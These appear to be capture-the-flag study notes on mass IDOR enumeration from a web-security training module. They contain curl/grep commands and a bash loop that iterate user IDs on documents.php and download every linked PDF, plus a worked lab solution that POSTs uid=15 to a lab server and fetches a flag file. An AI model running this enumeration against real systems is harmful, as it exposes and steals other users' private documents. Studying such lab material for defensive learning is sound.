Mass IDOR Enumeration

http://SERVER_IP:PORT/documents.php?uid=1
http://SERVER_IP:PORT/documents.php?uid=2
/documents/Invoice_1_09_2021.pdf
/documents/Report_1_10_2021.pdf
# Ctrl+U to see the source page
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>
# Then use curl
curl -s "http://SERVER_IP:PORT/documents.php?uid=1" | grep "<li class='pure-tree_link'>"

# Or just use regex to get the specific file that we need
curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "\/documents.*?.pdf"
#!/bin/bash

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                wget -q $url/$link
        done
done

For the challenge

Intercept this page

It's a POST request

Set a payload

See the result

Verify the result

curl -i -X POST -d 'uid=15' http://94.237.54.116:49507/documents.php

Get the result

http://94.237.54.116:49507/documents/flag_11dfa168ac8eb2958e38425728623c98.txt
curl http://94.237.54.116:49507/documents/flag_11dfa168ac8eb2958e38425728623c98.txt
PreviousIdentifying IDORsNextBypassing Encoded References

Last updated